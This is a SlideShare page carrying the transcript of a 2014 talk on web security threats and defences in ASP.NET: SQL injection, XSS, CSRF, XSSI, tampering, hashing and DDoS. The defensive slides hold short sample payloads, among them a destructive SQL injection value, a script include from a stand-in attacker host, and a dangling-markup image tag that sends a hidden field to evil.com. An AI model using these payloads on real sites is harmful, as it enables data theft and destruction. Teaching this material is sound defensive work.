OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 
NoSQL, no security?
NoSQL, no security?NoSQL, no security?
NoSQL, no security?
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
NoSql Injection
NoSql InjectionNoSql Injection
NoSql Injection
 
Making DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring ApplicationsMaking DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring Applications
 
Secure software development presentation
Secure software development presentationSecure software development presentation
Secure software development presentation
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 

More from Ivo Andreev

Cybersecurity and Generative AI - for Good and Bad vol.2
Cybersecurity and Generative AI - for Good and Bad vol.2Cybersecurity and Generative AI - for Good and Bad vol.2
Cybersecurity and Generative AI - for Good and Bad vol.2
Ivo Andreev
 
Architecting AI Solutions in Azure for Business
Architecting AI Solutions in Azure for BusinessArchitecting AI Solutions in Azure for Business
Architecting AI Solutions in Azure for Business
Ivo Andreev
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
Ivo Andreev
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AI
Ivo Andreev
 
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers
How do OpenAI GPT Models Work - Misconceptions and Tips for DevelopersHow do OpenAI GPT Models Work - Misconceptions and Tips for Developers
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers
Ivo Andreev
 
OpenAI GPT in Depth - Questions and Misconceptions
OpenAI GPT in Depth - Questions and MisconceptionsOpenAI GPT in Depth - Questions and Misconceptions
OpenAI GPT in Depth - Questions and Misconceptions
Ivo Andreev
 
Cutting Edge Computer Vision for Everyone
Cutting Edge Computer Vision for EveryoneCutting Edge Computer Vision for Everyone
Cutting Edge Computer Vision for Everyone
Ivo Andreev
 
Collecting and Analysing Spaceborn Data
Collecting and Analysing Spaceborn DataCollecting and Analysing Spaceborn Data
Collecting and Analysing Spaceborn Data
Ivo Andreev
 
Collecting and Analysing Satellite Data with Azure Orbital
Collecting and Analysing Satellite Data with Azure OrbitalCollecting and Analysing Satellite Data with Azure Orbital
Collecting and Analysing Satellite Data with Azure Orbital
Ivo Andreev
 
Language Studio and Custom Models
Language Studio and Custom ModelsLanguage Studio and Custom Models
Language Studio and Custom Models
Ivo Andreev
 
CosmosDB for IoT Scenarios
CosmosDB for IoT ScenariosCosmosDB for IoT Scenarios
CosmosDB for IoT Scenarios
Ivo Andreev
 
Forecasting time series powerful and simple
Forecasting time series powerful and simpleForecasting time series powerful and simple
Forecasting time series powerful and simple
Ivo Andreev
 
Constrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project BonsaiConstrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project Bonsai
Ivo Andreev
 
Azure security guidelines for developers
Azure security guidelines for developers Azure security guidelines for developers
Azure security guidelines for developers
Ivo Andreev
 
Autonomous Machines with Project Bonsai
Autonomous Machines with Project BonsaiAutonomous Machines with Project Bonsai
Autonomous Machines with Project Bonsai
Ivo Andreev
 
Global azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure LighthouseGlobal azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure Lighthouse
Ivo Andreev
 
Flux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JSFlux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JS
Ivo Andreev
 
Azure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challengesAzure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challenges
Ivo Andreev
 
Industrial IoT on Azure
Industrial IoT on AzureIndustrial IoT on Azure
Industrial IoT on Azure
Ivo Andreev
 
The Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it WorkThe Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it Work
Ivo Andreev
 

More from Ivo Andreev (20)

Cybersecurity and Generative AI - for Good and Bad vol.2
Cybersecurity and Generative AI - for Good and Bad vol.2Cybersecurity and Generative AI - for Good and Bad vol.2
Cybersecurity and Generative AI - for Good and Bad vol.2
 
Architecting AI Solutions in Azure for Business
Architecting AI Solutions in Azure for BusinessArchitecting AI Solutions in Azure for Business
Architecting AI Solutions in Azure for Business
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AI
 
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers
How do OpenAI GPT Models Work - Misconceptions and Tips for DevelopersHow do OpenAI GPT Models Work - Misconceptions and Tips for Developers
How do OpenAI GPT Models Work - Misconceptions and Tips for Developers
 
OpenAI GPT in Depth - Questions and Misconceptions
OpenAI GPT in Depth - Questions and MisconceptionsOpenAI GPT in Depth - Questions and Misconceptions
OpenAI GPT in Depth - Questions and Misconceptions
 
Cutting Edge Computer Vision for Everyone
Cutting Edge Computer Vision for EveryoneCutting Edge Computer Vision for Everyone
Cutting Edge Computer Vision for Everyone
 
Collecting and Analysing Spaceborn Data
Collecting and Analysing Spaceborn DataCollecting and Analysing Spaceborn Data
Collecting and Analysing Spaceborn Data
 
Collecting and Analysing Satellite Data with Azure Orbital
Collecting and Analysing Satellite Data with Azure OrbitalCollecting and Analysing Satellite Data with Azure Orbital
Collecting and Analysing Satellite Data with Azure Orbital
 
Language Studio and Custom Models
Language Studio and Custom ModelsLanguage Studio and Custom Models
Language Studio and Custom Models
 
CosmosDB for IoT Scenarios
CosmosDB for IoT ScenariosCosmosDB for IoT Scenarios
CosmosDB for IoT Scenarios
 
Forecasting time series powerful and simple
Forecasting time series powerful and simpleForecasting time series powerful and simple
Forecasting time series powerful and simple
 
Constrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project BonsaiConstrained Optimization with Genetic Algorithms and Project Bonsai
Constrained Optimization with Genetic Algorithms and Project Bonsai
 
Azure security guidelines for developers
Azure security guidelines for developers Azure security guidelines for developers
Azure security guidelines for developers
 
Autonomous Machines with Project Bonsai
Autonomous Machines with Project BonsaiAutonomous Machines with Project Bonsai
Autonomous Machines with Project Bonsai
 
Global azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure LighthouseGlobal azure virtual 2021 - Azure Lighthouse
Global azure virtual 2021 - Azure Lighthouse
 
Flux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JSFlux QL - Nexgen Management of Time Series Inspired by JS
Flux QL - Nexgen Management of Time Series Inspired by JS
 
Azure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challengesAzure architecture design patterns - proven solutions to common challenges
Azure architecture design patterns - proven solutions to common challenges
 
Industrial IoT on Azure
Industrial IoT on AzureIndustrial IoT on Azure
Industrial IoT on Azure
 
The Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it WorkThe Power of Auto ML and How Does it Work
The Power of Auto ML and How Does it Work
 

Recently uploaded

Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Hivelance Technology
 
Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024
Sharepoint Designs
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Globus
 
Why React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdfWhy React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdf
ayushiqss
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
Georgi Kodinov
 
De mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FMEDe mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FME
Jelle | Nordend
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
Peter Caitens
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Globus
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Globus
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
Cyanic lab
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
Globus
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
Max Andersen
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
vrstrong314
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
Ortus Solutions, Corp
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
informapgpstrackings
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
XfilesPro
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 

Recently uploaded (20)

Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...
 
Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024Explore Modern SharePoint Templates for 2024
Explore Modern SharePoint Templates for 2024
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
 
Why React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdfWhy React Native as a Strategic Advantage for Startup Innovation.pdf
Why React Native as a Strategic Advantage for Startup Innovation.pdf
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
 
De mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FMEDe mooiste recreatieve routes ontdekken met RouteYou en FME
De mooiste recreatieve routes ontdekken met RouteYou en FME
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
 
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
 

Web Security Threats and Solutions

  • 1. var title = “Web Security Threats and Solutions”; var info = { name: “Ivelin Andreev”, otherOptional: “Security is not for granted” Sofia NovN 2o3v ,2 23,0 210414 };
  • 2. Nov 23, 2014 About me • Project Manager @ o 12 years professional experience o .NET Web Development MCPD o SQL Server 2012 (MCSA) • Business Interests o Web Development, SOA, Integration o Security & Performance Optimization o Horizon2020, Open BIM, GIS, Mapping • Contact me o ivelin.andreev@icb.bg o www.linkedin.com/in/ivelin o www.slideshare.net/ivoandreev
  • 3. Nov 23, 2014 Web Security is Important Common misconceptions • I am using ASP.NET ?!?! • I am too small to be noticed by crackers • I am too busy for security, my brand is important • I am not operating in the financial industry • Security seal means nothing for customers • Hosting provider does not matter
  • 4. Nov 23, 2014 agenda(); • SQL Injection • Cross-Site Scripting (CSS) • Cross-Site Request Forgery (CSRF) • Cross-Site Script Inclusion (CSSI) • Parameter Tampering • Information Leakage • Distributed Denial of Service • Demo
  • 5. SQL injection is so old... Nov 23, 2014 Don’t developers know any better?
  • 6. Nov 23, 2014 SQL Injection Def: Commands or logic inserted in SQL data channel • Common Reasons o Dynamic query statements and string operations o Poor programming • Impact o Leak or loss of data o Authentication and authorization • Impact (you many have not considered) o Damages limited only by the SQL account permissions o Windows authentication user rights can be exploited o Modify server security configuration o Install backdoors
  • 8. Nov 23, 2014 (Pseudo) Solutions • Replace special symbols (-, “, ‘) o Data with special symbols not searchable o Poor routines can create vulnerable query (i.e. –’–) • Smuggling o Looks like a quote but not a quote - conversion on DB level o OWASP_IL_2007_SQL_Smuggling.pdf • NOSQL is not vulnerable o NOSQL is also vulnerable (i.e. MongoDB with JavaScript) • Second order attacks o Validate request only o Data stored in the DB and later used in prepared queries
  • 9. Using Parameters (in wrong manner) Nov 23, 2014 • Dynamic queries (sp_executesql vs. EXEC) o exec (@sqlString) – executes T-SQL string o sp_executesql allows for statements to be parameterized o sp_executesql is more secure in terms of SQL injection • Developer believes dynamic SQL is the only option CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS DECLARE @sql nvarchar(255) SET @sql = 'SELECT UserName FROM Users ' + @Sort EXECUTE sp_executesql @sql GO o What if @Sort = ‘‘; DELETE FROM Users’ CREATE PROCEDURE GetUsers @Sort Int AS SELECT UserName FROM Users ORDER BY CASE WHEN @Sort = 1 THEN ( Rank() OVER (ORDER BY UserName ASC) ) END GO
  • 10. Nov 23, 2014 Prevention & Mitigation • Parameterized queries and prepared statements o Use parameters where data are expected o ORMs use parameters (Nhibernate, Entity Framework) • “The least privilege” principle o Grant the minimum access rights o Parameterized queries vs. Stored Procedure permissions • Positive input validation (Poor) o Regular expressions / White lists (i.e. alphanumeric) • IIS Request Query Filtering (Poor) o filtering-for-sql-injection-on-iis-7-and-later • SQL injection and DB takeover o http://ha.ckers.org/sqlinjection/ o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/
  • 11. SQL Injection with Entity Framework Nov 23, 2014 • Entity Framework Raw Queries string query = “query” + “SQL injection code” dbContext.Database.SqlQuery<string>(query).ToList(); o Security Considerations (Entity Framework) • IQueryable o Can result in untrusted calls o If provided as a library, can be casted to Context and connection var orders = repository.GetOrders(5); var context = ((ObjectQuery)orders).Context o Use IEnumerable instead
  • 13. Nov 23, 2014 Cross Site Scripting (XSS) Def: Untrusted content displayed on page unencoded • Case o evilHacker injects <script> in http://goodSite.com application context • By posting HTML form field • By tricking user to click link with query parameters sent by mail %3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E • XSS Source o Query parameters, HTML form fields o HTML Attributes (onload, onblur) o URI requested and displayed in HTTP 404 page o Data from DB or file system o 3rd party data - RSS feeds or service
  • 14. Nov 23, 2014 XSS – an Underestimated Threat • Create or access any DOM element • Hijack cookies, credentials or actions • Take control over victim machine Browser Exploitation Framework Project o Open source penetration testing tool o XSS vulnerability allows injection of BeEF o Victim browser is hooked o Perform actions/attacks on behalf of the victim o Exploit system in browser context
  • 15. Nov 23, 2014 Persisted XSS • Attacker stores malicious data on server • Unvalidated data displayed on page w/o encoding • Store once – run many
  • 16. Nov 23, 2014 Reflected XSS • Malicious client data is immediately used by server • Unvalidated data displayed on page w/o encoding • Requires social engineering o Convince users to follow a URL (via e-mail or forum comment) • Detection Tools o OWASP Xenotix XSS Exploit Framework o XSS-ME FireFox plugin
  • 17. Nov 23, 2014 Client XSS & HTML Injection • DOM-based XSS o Malicious data executed as a part of DOM manipulation o Requires social engineering document.write(“ <OPTION value=1>"+document.location.href.substring(…) + ”</OPTION>"); • Dangling Markup HTML injection o Image source w/o closing tag o On load of image – a request is made to attacker’s site <img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name=“SecretField" value="12345"> ... '← Normally-occurring apostrophe somewhere in page text o HTML leaks to evil site
  • 18. Nov 23, 2014 All user input is evil
  • 19. Nov 23, 2014 XSS Prevention & Mitigation • HTML escape then JavaScript escape • Encode on usage, not appearance o HttpUtility.HtmlEncode(string) o HttpUtility.JavaScriptStringEncode(string) o Microsoft Anti-Cross Site Scripting Library • Use proven sanitizers o Blacklist vs. Whitelist o Valid JavaScript can be created by poor filtering routine <SscriptCscriptRscriptIscriptPscriptTscript>… • Check 3rd party resources (i.e. jQuery plugins) • Analyze places where DOM elements are created o Use document.createElement() rather than $(obj).html()
  • 20. Built-In XSS Prevention Features (.NET) Nov 23, 2014 • Request Validation o ASP .NET Web Forms: @Page EnableRequestValidation=“true” o ASP .NET MVC: Controller.ValidateRequest=true; o <httpRuntime requestValidationMode=“4.0" /> • Do not turn off request validation o “Easy fix” for HTML editors o Use HTML editors that HTML encode before submission • Reliability o Microsoft advice: Relying solely on built-in request validation is not enough o No known vulnerabilities now (but not in the past) • AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode() o HttpUtility just ensures output does not break HTML o Performance penalty is +0.1 ms/transaction
  • 21. Nov 23, 2014 Content Security Policy • HTTP Header o Content-Security-Policy: script-src ‘self’ • Features o Whitelist sources of trusted content o Blocks resources from untrusted locations (incl. inline scripts) o Report of blocked resources • Directives o script-src; img-src; media-src; style-src; frame-src; connect-src • Keywords o 'none‘, 'self‘, 'unsafe-inline‘, 'unsafe-eval‘ • Browser support o CanIUse.com CSP?
  • 22. CSRF has nothing to do with sea-surf Nov 23, 2014
  • 23. Cross-Site Request Forgery (CSRF) • POST new password in form to GoodSite.com • GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker Nov 23, 2014 Def: Unauthorised commands transmitted from a user whom a website trusts • Synonyms: One-click attack, Session riding • Case o User logs in http://goodSite.com as usual o http://evilHacker.com can o Authenticated because cookies are sent • Impact o EvilHacker.com cannot read DOM but can POST / GET o Act on behalf of the user (i.e. payment) o User access is blocked or stolen
  • 24. Cross Site Scripting Inclusion (XSSI) Nov 23, 2014 • Case o Exploits <script> element exception to Same Origin Policy o http://goodSite.com includes own <script> for AJAX request o http://evilHacker.com includes the same script • Authenticated because cookies are sent o Server returns JSON wrapped in function call <script type="application/javascript" src= "http://goodSite.com/Svc/Get?callback=parseResponse" /> o SCRIPT evaluated in evilHacker.com context and JSON is stolen parseResponse ({“this”:”is”,”json”:”data”}); • Impact o User data are stolen • Prevention o Check policy of script inclusion
  • 25. Nov 23, 2014 CSRF Prevention & Mitigation • NONCE token (URL, hidden field) o Checked upon submission o Protected by browser same origin policy • User defined (password, CAPTCHA) • Built-In (ASP.NET) Page.ViewStateUserKey=Session.SessionID o Signs the ViewState with unique user key • Built-In (ASP.NET MVC) o HtmlHelper.AntiForgeryToken() - generates a hidden form field o [ValidateAntiForgeryToken] attribute for controller validation o NOT a single-use token • POST(HTTP) makes attacks harder o Cross domain POSTs can be limited (CORS)
  • 26. Nov 23, 2014 Parameter tampering
  • 27. Nov 23, 2014 Parameter Tampering Def: Parameters changed in unintended way Common reasons • Query string; Hidden form fields; • Data-channel interception (M-i-t-M attack) Common Mistakes • Client side validation only • Mismatch with predefined set of values • Not validated access to entities on server (i.e. EntityId=???) • Unprotected data sent to client o Query strings; JavaScript parameters
  • 28. Tampering Prevention & Mitigation Nov 23, 2014 • Built-In (ASP.NET MVC) - None • Built-In (ASP.NET) • ViewState o Not encrypted by default (Binary serialized, Base64 Encoded) o Do not turn EnableViewstateMac off (Web Farm, X-domain POST) • Event Validation o “Invalid postback or callback argument…” o Not encrypted (Binary serialized, Base64 Encoded) o Do not turn event validation off o Register for event validation protected override void Render(HtmlTextWriter writer) { … Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, “John”); }
  • 29. Nov 23, 2014 Encryption & Hashing
  • 30. Nov 23, 2014 Encryption • Protects sensitive data (if stolen) o Credentials; Auth tokens; Configuration; • SQL data encryption o EncryptByPassPhrase o EncryptByCert o EncryptByKey • Application level o AesCryptoService, RijndaelManaged o TripleDESCryptoServiceProvider • Connection string encryption o Machine specific encryption after deploy aspnet_regiis –pe “connectionstrings” –app /[appname] o Decryption done automatically
  • 31. Nov 23, 2014 Hashing • Irreversible function (MD5, SHA1, SHA256) o MD5 generator: http://www.md5.cz/ o Smaller than the data • Collisions allowed • Usage o Assure information was not changed (tampered) o Protect passwords • Compromising o Good algorithm is always compromised by weak passwords o Brute force (GPU) o Precalculated “Rainbow tables” (Dictionary attack) • http://www.hashkiller.co.uk/md5-decrypter.aspx
  • 32. Nov 23, 2014 Protecting Hashes • Random Salt o [SecretText][Salt] -> [Hash] o Changes hash value o Invalidates rainbow tables o Slows down brute force attacks • Complex passwords • Slow algorithms • Key stretching (Rfc2898DeriveBytes class) U1 = PRF(Password, Salt) U2 = PRF(Password, U1) ... Uc = PRF(Password, Uc-1) • Outsource sensitive data storage (if possible)
  • 33. Nov 23, 2014 Information Leakage • Loss of sensitive data o Display trace and log information o Display raw error messages o Google it: inurl: elmah.axd aspxauth o Attacker can profile application and select appropriate attack • Mitigation o Custom error pages <CustomErrors mode=“on” defaultRedirect=“Error.aspx”> o Turn off tracing • Retail mode <deployment retail=“true”/> o Set in machine.config for the whole server o Sets Custom Errors = “on”, Debug = “false” o Trace information is not displayed • Test
  • 34. Nov 23, 2014 Transport Layer Security
  • 35. Nov 23, 2014 SSL / TLS • HTTP over SSL prevents packet sniffing • Force SSL for the entire site o Or at least for credentials interchange • ASP.NET MVC: RequireHttpsAttribute o Redirects Request to HTTPS scheme • ASP.NET Web Forms o Requires custom code o https://code.google.com/p/securityswitch/ <securitySwitch mode="RemoteOnly"> <paths> <add path="~/Login.aspx" /> </paths> </securitySwitch>
  • 36. Nov 23, 2014 Distributed Denial of Service
  • 37. Nov 23, 2014 Denial of Service Attack DDoS • Anonymous?! o LOIC (Hive mode) o TOR Anonymity Project • Hash DoS (since 2003) o POST params in hash table (with collisions) o Too many hashes = 100% CPU o Patch: Block POST of >1000 form fields Prevention & Mitigation • Dynamic IP restrictions IIS extension o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions • Good logging and diagnostics is essential
  • 38. Nov 23, 2014 Demo DEMO
  • 39. Nov 23, 2014 Takeaways • Guidelines & Code Labs o Open Web Application Security Project www.owasp.org o Web App Exploits and Defenses google-gruyere o 2013 Top 10 Web Security Vulnerabilities Top_10_2013 o 2011 Top 25 Most Dangerous Software Errors cwe.mitre.org/top25 • Articles o Hack-proofing ASP.NET Web Applications Adam Tuliper o Hash DDoS Hash-Dos-Attack • .NET Source Code referencesource.microsoft.com • Tools o ASafaWeb Analyser asafaweb.com o Website and Web Server Security Testing www.beyondsecurity.com
  • 40. Nov 23, 2014 Upcoming events ISTA Conference 26-27 November http://istabg.org/ Stay tuned for 2015: Azure Bootcamp http://azure-camp.eu/ UXify Bulgaria http://uxify.org/ SQLSaturday https://www.sqlsaturday.com/ and more js.next();
  • 41. Nov 23, 2014 Thanks to our Sponsors: Diamond Sponsor: Hosting partner: Gold Sponsors: Silver Sponsors: Technological Partners: Swag Sponsors: Media Partners: